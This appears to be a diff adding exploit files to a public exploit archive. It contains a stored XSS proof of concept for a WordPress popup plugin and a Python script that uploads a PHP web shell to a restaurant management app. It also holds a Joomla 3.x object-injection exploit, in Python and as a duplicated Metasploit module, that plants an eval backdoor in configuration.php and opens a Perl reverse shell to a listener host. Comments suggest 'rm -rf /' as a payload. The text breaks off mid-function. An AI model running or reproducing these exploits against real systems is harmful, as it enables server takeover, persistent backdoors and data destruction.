+# Exploit Title: Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"\wp-content\plugins\popupbuilder"
+# Date: 2019-06-13
+# Exploit Author: Unk9vvN
+# Vendor Homepage: https://popup-builder.com/
+# Software Link: https://wordpress.org/plugins/popup-builder/
+# Version: 3.49
+# Tested on: Kali Linux
+# CVE: N/A
+
+
+# Description
+# This vulnerability is in the validation mode and is located in "Add Post" or "Add Page" of wordpress and the vulnerability type is stored ,after install Popup Builder it will make section in Add Post  and Add Page . in this section you will choose which popup show it will create option tag with value of title of the popups, now its easy we just break option tag and insert our script tag inside popup title.
+
+1.Go to the 'Add new' section of Popup Builder
+2.Select Image type
+3.Enter the payload in the "add Title"
+4.Click the "Publish" option
+5.Go to Add New of Page section or Add New of Post section
+6.Your payload will run
+
+
+# URI: http://localhost/wordpress/wp-admin/post-new.php?post_type=popupbuilder&sgpb_type=image&wp-post-new-reload=true
+# Parameter & Payoad: post_title="/><script>alert("Unk9vvN")</script>
+
+
+#
+# POC
+#
+POST /wordpress/wp-admin/post.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post.php?post=39&action=edit
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2425
+Cookie: ......
+Connection: close
+Upgrade-Insecure-Requests: 1
+DNT: 1
+
+_wpnonce=8dde4c5262&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=popupbuilder&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D39%26action%3Dedit&post_ID=39&meta-box-order-nonce=5e054a06d1&closedpostboxesnonce=03e898cf80&post_title=%22%2F%3E%3Cscript%3Ealert%28%22Unk9vvN%22%29%3C%2Fscript%3E&samplepermalinknonce=fc4f7ec2ab&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=09&jj=13&aa=2019&hh=15&mn=01&ss=34&hidden_mm=09&cur_mm=09&hidden_jj=13&cur_jj=13&hidden_aa=2019&cur_aa=2019&hidden_hh=15&cur_hh=15&hidden_mn=01&cur_mn=03&original_publish=Update&save=Update&tax_input%5Bpopup-categories%5D%5B%5D=0&newpopup-categories=New+Category+Name&newpopup-categories_parent=-1&_ajax_nonce-add-popup-categories=11ba2a6f5c&sgpb-image-url=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-content%2Fuploads%2F2019%2F09%2Fwp2601087.jpg&sgpb-target%5B0%5D%5B0%5D%5Bparam%5D=not_rule&sgpb-type=image&sgpb-is-preview=0&sgpb-is-active=checked&sgpb-events%5B0%5D%5B0%5D%5Bparam%5D=load&sgpb-events%5B0%5D%5B0%5D%5Bvalue%5D=&sgpb-behavior-after-special-events%5B0%5D%5B0%5D%5Bparam%5D=select_event&sgpb-popup-z-index=9999&sgpb-popup-themes=sgpb-theme-1&sgpb-overlay-custom-class=sgpb-popup-overlay&sgpb-overlay-color=&sgpb-overlay-opacity=0.8&sgpb-content-custom-class=sg-popup-content&sgpb-esc-key=on&sgpb-enable-close-button=on&sgpb-close-button-delay=0&sgpb-close-button-position=bottomRight&sgpb-button-position-top=&sgpb-button-position-right=9&sgpb-button-position-bottom=9&sgpb-button-position-left=&sgpb-button-image=&sgpb-button-image-width=21&sgpb-button-image-height=21&sgpb-border-color=%23000000&sgpb-border-radius=0&sgpb-border-radius-type=%25&sgpb-button-text=Close&sgpb-overlay-click=on&sgpb-popup-dimension-mode=responsiveMode&sgpb-responsive-dimension-measure=auto&sgpb-width=640px&sgpb-height=480px&sgpb-max-width=&sgpb-max-height=&sgpb-min-width=120&sgpb-min-height=&sgpb-open-animation-effect=No+effect&sgpb-close-animation-effect=No+effect&sgpb-enable-content-scrolling=on&sgpb-popup-order=0&sgpb-popup-delay=0&post_name=scriptalert1script
\ No newline at end of file
diff --git a/exploits/php/webapps/47520.py b/exploits/php/webapps/47520.py
new file mode 100755
index 000000000..8589e7f5b
--- /dev/null
+++ b/exploits/php/webapps/47520.py
@@ -0,0 +1,73 @@
+# Exploit Title: Restaurant Management System 1.0  - Remote Code Execution
+# Date: 2019-10-16
+# Exploit Author: Ibad Shah
+# Vendor Homepage: https://www.sourcecodester.com/users/lewa
+# Software Link: https://www.sourcecodester.com/php/11815/restaurant-management-system.html
+# Version: N/A
+# Tested on: Apache 2.4.41
+
+#!/usr/bin/python
+
+import requests
+import sys
+
+print ("""
+    _  _   _____  __  __  _____   ______            _       _ _
+  _| || |_|  __ \|  \/  |/ ____| |  ____|          | |     (_) |
+ |_  __  _| |__) | \  / | (___   | |__  __  ___ __ | | ___  _| |_
+  _| || |_|  _  /| |\/| |\___ \  |  __| \ \/ / '_ \| |/ _ \| | __|
+ |_  __  _| | \ \| |  | |____) | | |____ >  <| |_) | | (_) | | |_
+   |_||_| |_|  \_\_|  |_|_____/  |______/_/\_\ .__/|_|\___/|_|\__|
+                                             | |
+                                             |_|
+
+
+""")
+print ("Credits : All InfoSec (Raja Ji's) Group")
+url = sys.argv[1]
+
+if len(sys.argv[1]) < 8:
+	print("[+] Usage : python rms-rce.py http://localhost:80/")
+	exit()
+	
+print ("[+] Restaurant Management System Exploit, Uploading Shell")
+
+target = url+"admin/foods-exec.php"
+
+
+
+headers = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0)
+Gecko/20100101 Firefox/69.0",
+    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+    "Accept-Language": "en-US,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate",
+    "Content-Length": "327",
+    "Content-Type": "multipart/form-data;
+boundary=---------------------------191691572411478",
+    "Connection": "close",
+	"Referer": "http://localhost:8081/rms/admin/foods.php",
+	"Cookie": "PHPSESSID=4dmIn4q1pvs4b79",
+	"Upgrade-Insecure-Requests": "1"
+
+}
+
+data = """
+
+-----------------------------191691572411478
+Content-Disposition: form-data; name="photo"; filename="reverse-shell.php"
+Content-Type: text/html
+
+<?php echo shell_exec($_GET["cmd"]); ?>
+-----------------------------191691572411478
+Content-Disposition: form-data; name="Submit"
+
+Add
+-----------------------------191691572411478--
+"""
+r = requests.post(target,verify=False, headers=headers,data=data,
+proxies={"http":"http://127.0.0.1:8080"})
+
+
+print("[+] Shell Uploaded. Please check the URL :
+"+url+"images/reverse-shell.php")
\ No newline at end of file
diff --git a/exploits/php/webapps/47524.py b/exploits/php/webapps/47524.py
new file mode 100755
index 000000000..48978b91d
--- /dev/null
+++ b/exploits/php/webapps/47524.py
@@ -0,0 +1,479 @@
+# Exploit Title: Joomla! 3.4.6 - Remote Code Execution
+# Google Dork: N/A
+# Date: 2019-10-02
+# Exploit Author: Alessandro Groppo
+# Vendor Homepage: https//www.joomla.it/
+# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
+# Version: 3.0.0 --> 3.4.6
+# Tested on: Linux
+# CVE : N/A
+
+
+# Technical details: https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41
+# Github: https://github.com/kiks7/rusty_joomla_rce
+#
+# The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive.
+# If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
+
+
+#!/usr/bin/env python3
+import requests
+from bs4 import BeautifulSoup
+import sys
+import string
+import random
+import argparse
+from termcolor import colored
+
+PROXS = {'http':'127.0.0.1:8080'}
+PROXS = {}
+
+def random_string(stringLength):
+	letters = string.ascii_lowercase
+	return ''.join(random.choice(letters) for i in range(stringLength))
+
+
+backdoor_param = random_string(50)
+
+def print_info(str):
+	print(colored("[*] " + str,"cyan"))
+
+def print_ok(str):
+	print(colored("[+] "+ str,"green"))
+
+def print_error(str):
+	print(colored("[-] "+ str,"red"))
+
+def print_warning(str):
+	print(colored("[!!] " + str,"yellow"))
+
+def get_token(url, cook):
+	token = ''
+	resp = requests.get(url, cookies=cook, proxies = PROXS)
+	html = BeautifulSoup(resp.text,'html.parser')
+	# csrf token is the last input
+	for v in html.find_all('input'):
+		csrf = v
+	csrf = csrf.get('name')
+	return csrf
+
+
+def get_error(url, cook):
+	resp = requests.get(url, cookies = cook, proxies = PROXS)
+	if 'Failed to decode session object' in resp.text:
+		#print(resp.text)
+		return False
+	#print(resp.text)
+	return True
+
+
+def get_cook(url):
+	resp = requests.get(url, proxies=PROXS)
+	#print(resp.cookies)
+	return resp.cookies
+
+
+def gen_pay(function, command):
+	# Generate the payload for call_user_func('FUNCTION','COMMAND')
+	template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	#payload =  command + ' || $a=\'http://wtf\';'
+	payload =  'http://l4m3rz.l337/;' + command
+	# Following payload will append an eval() at the enabled of the configuration file
+	#payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
+	function_len = len(function)
+	final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
+	return final
+
+def make_req(url , object_payload):
+	# just make a req with object
+	print_info('Getting Session Cookie ..')
+	cook = get_cook(url)
+	print_info('Getting CSRF Token ..')
+	csrf = get_token( url, cook)
+
+	user_payload = '\\0\\0\\0' * 9
+	padding = 'AAA' # It will land at this padding
+	working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
+	clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
+
+	inj_object = '";'
+	inj_object += object_payload
+	inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
+	password_payload = padding + inj_object
+	params = {
+            'username': user_payload,
+            'password': password_payload,
+            'option':'com_users',
+            'task':'user.login',
+            csrf :'1'
+            }
+
+	print_info('Sending request ..')
+	resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
+	return resp.text
+
+def get_backdoor_pay():
+	# This payload will backdoor the the configuration .PHP with an eval on POST request
+
+	function = 'assert'
+	template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	# payload =  command + ' || $a=\'http://wtf\';'
+	# Following payload will append an eval() at the enabled of the configuration file
+	payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
+	function_len = len(function)
+	final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
+	return final
+
+def check(url):
+	check_string = random_string(20)
+	target_url = url + 'index.php/component/users'
+	html = make_req(url, gen_pay('print_r',check_string))
+	if check_string in html:
+		return True
+	else:
+		return False
+
+def ping_backdoor(url,param_name):
+	res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
+	if 'PWNED' in res.text:
+		return True
+	return False
+
+def execute_backdoor(url, payload_code):
+	# Execute PHP code from the backdoor
+	res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
+	print(res.text)
+
+def exploit(url, lhost, lport):
+	# Exploit the target
+	# Default exploitation will append en eval function at the end of the configuration.pphp
+	# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
+	# e.g. get_payload('system','rm -rf /')
+
+	# First check that the backdoor has not been already implanted
+	target_url = url + 'index.php/component/users'
+
+	make_req(target_url, get_backdoor_pay())
+	if ping_backdoor(url, backdoor_param):
+		print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
+		print_info('Now it\'s time to reverse, trying with a system + perl')
+		execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
+
+
+if __name__ == '__main__':
+	parser = argparse.ArgumentParser()
+	parser.add_argument('-t','--target',required=True,help='Joomla Target')
+	parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
+	parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
+	parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
+	parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
+	args = vars(parser.parse_args())
+
+	url = args['target']
+	if(check(url)):
+		print_ok('Vulnerable')
+		if args['exploit']:
+			exploit(url, args['lhost'], args['lport'])
+		else:
+			print_info('Use --exploit to exploit it')
+
+	else:
+		print_error('Seems NOT Vulnerable ;/')
+
+
+metasploit_rusty_joomla_rce.rb
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Joomla
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Rusty Joomla Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+	PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
+	The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
+	That's because the exploit is more reliabale (doesn't rely on common disabled function). 
+	For this reason, use it with caution and remember the house cleaning.
+	Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with 
+	get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
+      },
+      'Author'	=>
+        [
+          'Alessandro \'kiks\' Groppo @Hacktive Security', 
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+		['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41']
+        ],
+      'Privileged'     => false, 
+      'Platform'       => 'PHP',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Joomla 3.0.0 - 3.4.6', {}]],
+      'DisclosureDate' => 'Oct 02  2019',
+      'DefaultTarget'  => 0)
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
+      ])
+  end
+
+  def get_random_string(length=50)
+  	source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a 
+	key=""
+	length.times{ key += source[rand(source.size)].to_s }
+	return key
+  end
+
+  def get_session_token
+	# Get session token from cookies
+	vprint_status('Getting Session Token')
+	res = send_request_cgi({
+		'method' => 'GET',
+		'uri' 	 => normalize_uri(target_uri.path) 
+	})
+	
+	cook = res.headers['Set-Cookie'].split(';')[0]
+	vprint_status('Session cookie: ' + cook)
+	return cook
+  end
+
+  def get_csrf_token(sess_cookie)
+	  vprint_status('Getting CSRF Token')
+
+	  res = send_request_cgi({
+		'method' => 'GET',
+		'uri'	 => normalize_uri(target_uri.path,'/index.php/component/users'),
+		'headers' => {
+			'Cookie' => sess_cookie,
+		}
+	  })
+
+	  html = res.get_html_document
+	  input_field = html.at('//form').xpath('//input')[-1]
+	  token = input_field.to_s.split(' ')[2]
+	  token = token.gsub('name="','').gsub('"','')
+	  if token then
+		  vprint_status('CSRF Token: ' + token)
+		  return token
+	  end
+	  print_error('Cannot get the CSRF Token ..')
+
+  end
+
+  def get_payload(function, payload)
+	  # @function: The PHP Function
+	  # @payload: The payload for the call
+	  template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	  # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
+	  payload = 'http://l4m3rz.l337/;' + payload
+	  final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
+	  return final
+  end
+
+ 
+  def get_payload_backdoor(param_name) 
+	# return the backdoor payload
+	# or better, the payload that will inject and eval function in configuration.php (in the root)
+	# As said in other part of the code. we cannot create new .php file because we cannot use 
+	# the ? character because of the check on URI schema
+	function = 'assert'
+        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'                                                             
+        # This payload will append an eval() at the end of the configuration file                                                                            
+        payload =  "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
+	template['PAYLOAD']  = payload 
+	template['LENGTH']   = payload.length.to_s
+	template['FUNC_NAME'] = function 
+	template['FUNC_LEN'] = function.length.to_s
+        return template 
+
+  end
+
+
+  def check_by_exploiting
+	    # Check that is vulnerable by exploiting it and try to inject a printr('something')
+	    # Get the Session anb CidSRF Tokens
+	    sess_token = get_session_token()
+	    csrf_token = get_csrf_token(sess_token)
+
+	    print_status('Testing with a POC object payload')
+
+	    username_payload = '\\0\\0\\0' * 9
+	    password_payload = 'AAA";'						# close the prev object
+	    password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')	# actual payload 
+	    password_payload += 's:6:"return":s:102:' 				# close cleanly the object
+	    res = send_request_cgi({
+			'uri'	   => normalize_uri(target_uri.path,'/index.php/component/users'),
+			'method'   => 'POST',
+			'headers'  => 
+				{
+				'Cookie' => sess_token,
+			},
+			'vars_post' => {
+				'username' => username_payload,
+				'password' => password_payload,
+				'option'   => 'com_users',
+				'task'	   => 'user.login',
+				csrf_token => '1',
+			}
+	    }) 
+	    # Redirect in order to retrieve the output
+	    if res.redirection then
+		res_redirect = send_request_cgi({
+			'method' => 'GET',
+			'uri'	 => res.redirection.to_s,
+			'headers' =>{
+				'Cookie' => sess_token
+			}
+		})
+
+		if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
+			return true
+		else
+			return false
+		end
+		
+	    end
+    end
+
+  def check
+    # Check if the target is UP and get the current version running by info leak    
+    res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
+    unless res
+      print_error("Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    # Parse XML to get the version 
+    if res.code == 200 then
+	    xml = res.get_xml_document
+	    version = xml.at('version').text
+	    print_status('Identified version ' + version)
+	    if version <= '3.4.6' and version >= '3.0.0' then
+		    if check_by_exploiting()
+			return Exploit::CheckCode::Vulnerable
+		    else
+			if check_by_exploiting() then
+			# Try the POC 2 times. 
+				return Exploit::CheckCode::Vulnerable
+			else
+				return Exploit::CheckCode::Safe
+			end
+		    end
+	    else
+		    return Exploit::CheckCode::Safe
+	    end
+    else
+	    print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
+	    if check_by_exploiting() then
+		    return Exploit::CheckCode::Vulnerable
+	    else
+		    if check_by_exploiting() then
+			return Exploit::CheckCode::Vulnerable
+		    else
+		    	return Exploit::CheckCode::Safe
+		    end
+	    end
+    end
+  end
+
+
+
+  
+  def exploit
+    if check == Exploit::CheckCode::Safe && !datastore['FORCE']
+      print_error('Target is not vulnerable')
+      return
+    end
+
+
+    pwned = false
+    cmd_param_name = get_random_string(50) 
+
+    sess_token = get_session_token()
+    csrf_token = get_csrf_token(sess_token)
+
+    # In order to avoid problems with disabled functions
+    # We are gonna append an eval() function at the end of the configuration.php file
+    # This will not cause any problem to Joomla and is a good way to execute then PHP directly
+    # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
+    # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
+    # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
+
+    # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
+    # 		Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
+
+    
+    # Implant the backdoor
+    vprint_status('Cooking the exploit ..')
+    username_payload = '\\0\\0\\0' * 9
+    password_payload = 'AAA";'						# close the prev object
+    password_payload += get_payload_backdoor(cmd_param_name)		# actual payload 
+    password_payload += 's:6:"return":s:102:' 				# close cleanly the object
+
+    print_status('Sending exploit ..')
+
+
+    res = send_request_cgi({
+		'uri'	   => normalize_uri(target_uri.path,'/index.php/component/users'),
+		'method'   => 'POST',
+		'headers'  => {
+			'Cookie' => sess_token
+		},
+		'vars_post' => {
+			'username' => username_payload,
+			'password' => password_payload,
+			'option'   => 'com_users',
+			'task'	   => 'user.login',
+			csrf_token => '1'
+		}
+    }) 
+
+    print_status('Triggering the exploit ..')    
+    if res.redirection then
+	res_redirect = send_request_cgi({
+		'method' => 'GET',
+		'uri'	 => res.redirection.to_s,
+		'headers' =>{
+			'Cookie' => sess_token
+		}
+	})
+    end
+
+    # Ping the backdoor see if everything is ok :/
+    res = send_request_cgi({
+		'method'     => 'POST',
+		'uri'	     => normalize_uri(target_uri.path,'configuration.php'),
+		'vars_post'  => {
+			cmd_param_name  => 'echo \'PWNED\';' 
+		}
+	})
+    if res.to_s.include? 'PWNED' then
+	print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
+	pwned = true
+    end
+
+
+
+    if pwned then
+        print_status('Now it\'s time to reverse shell')
+		res = send_request_cgi({
+		'method'     => 'POST',
+		'uri'	     => normalize_uri(target_uri.path,'configuration.php'),
+		'vars_post'  => {
+			cmd_param_name  => payload.encoded 
+		}
+	})
+    end
+
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47539.rb b/exploits/php/webapps/47539.rb
new file mode 100755
index 000000000..f9765bdf5
--- /dev/null
+++ b/exploits/php/webapps/47539.rb
@@ -0,0 +1,300 @@
+# Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit)
+# Google Dork: N/A
+# Date: 2019-10-02
+# Exploit Author: Alessandro Groppo
+# Vendor Homepage: https//www.joomla.it/
+# Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
+# Version: 3.0.0 --> 3.4.6
+# Tested on: Linux
+# CVE : N/A
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Joomla
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Rusty Joomla Unauthenticated Remote Code Execution',
+      'Description'    => %q{
+	PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
+	The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
+	That's because the exploit is more reliabale (doesn't rely on common disabled function). 
+	For this reason, use it with caution and remember the house cleaning.
+	Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with 
+	get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
+      },
+      'Author'	=>
+        [
+          'Alessandro \'kiks\' Groppo @Hacktive Security', 
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+		['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'],
+		['URL', 'https://github.com/kiks7/rusty_joomla_rce']
+        ],
+      'Privileged'     => false, 
+      'Platform'       => 'PHP',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Joomla 3.0.0 - 3.4.6', {}]],
+      'DisclosureDate' => 'Oct 02  2019',
+      'DefaultTarget'  => 0)
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
+      ])
+  end
+
+  def get_random_string(length=50)
+  	source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a 
+	key=""
+	length.times{ key += source[rand(source.size)].to_s }
+	return key
+  end
+
+  def get_session_token
+	# Get session token from cookies
+	vprint_status('Getting Session Token')
+	res = send_request_cgi({
+		'method' => 'GET',
+		'uri' 	 => normalize_uri(target_uri.path) 
+	})
+	
+	cook = res.headers['Set-Cookie'].split(';')[0]
+	vprint_status('Session cookie: ' + cook)
+	return cook
+  end
+
+  def get_csrf_token(sess_cookie)
+	  vprint_status('Getting CSRF Token')
+
+	  res = send_request_cgi({
+		'method' => 'GET',
+		'uri'	 => normalize_uri(target_uri.path,'/index.php/component/users'),
+		'headers' => {
+			'Cookie' => sess_cookie,
+		}
+	  })
+
+	  html = res.get_html_document
+	  input_field = html.at('//form').xpath('//input')[-1]
+	  token = input_field.to_s.split(' ')[2]
+	  token = token.gsub('name="','').gsub('"','')
+	  if token then
+		  vprint_status('CSRF Token: ' + token)
+		  return token
+	  end
+	  print_error('Cannot get the CSRF Token ..')
+
+  end
+
+  def get_payload(function, payload)
+	  # @function: The PHP Function
+	  # @payload: The payload for the call
+	  template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
+	  # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
+	  payload = 'http://l4m3rz.l337/;' + payload
+	  final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
+	  return final
+  end
+
+ 
+  def get_payload_backdoor(param_name) 
+	# return the backdoor payload
+	# or better, the payload that will inject and eval function in configuration.php (in the root)
+	# As said in other part of the code. we cannot create new .php file because we cannot use 
+	# the ? character because of the check on URI schema
+	function = 'assert'
+        template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'                                                             
+        # This payload will append an eval() at the end of the configuration file                                                                            
+        payload =  "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
+	template['PAYLOAD']  = payload 
+	template['LENGTH']   = payload.length.to_s
+	template['FUNC_NAME'] = function 
+	template['FUNC_LEN'] = function.length.to_s
+        return template 
+
+  end
+
+
+  def check_by_exploiting
+	    # Check that is vulnerable by exploiting it and try to inject a printr('something')
+	    # Get the Session anb CidSRF Tokens
+	    sess_token = get_session_token()
+	    csrf_token = get_csrf_token(sess_token)
+
+	    print_status('Testing with a POC object payload')
+
+	    username_payload = '\\0\\0\\0' * 9
+	    password_payload = 'AAA";'						# close the prev object
+	    password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')	# actual payload 
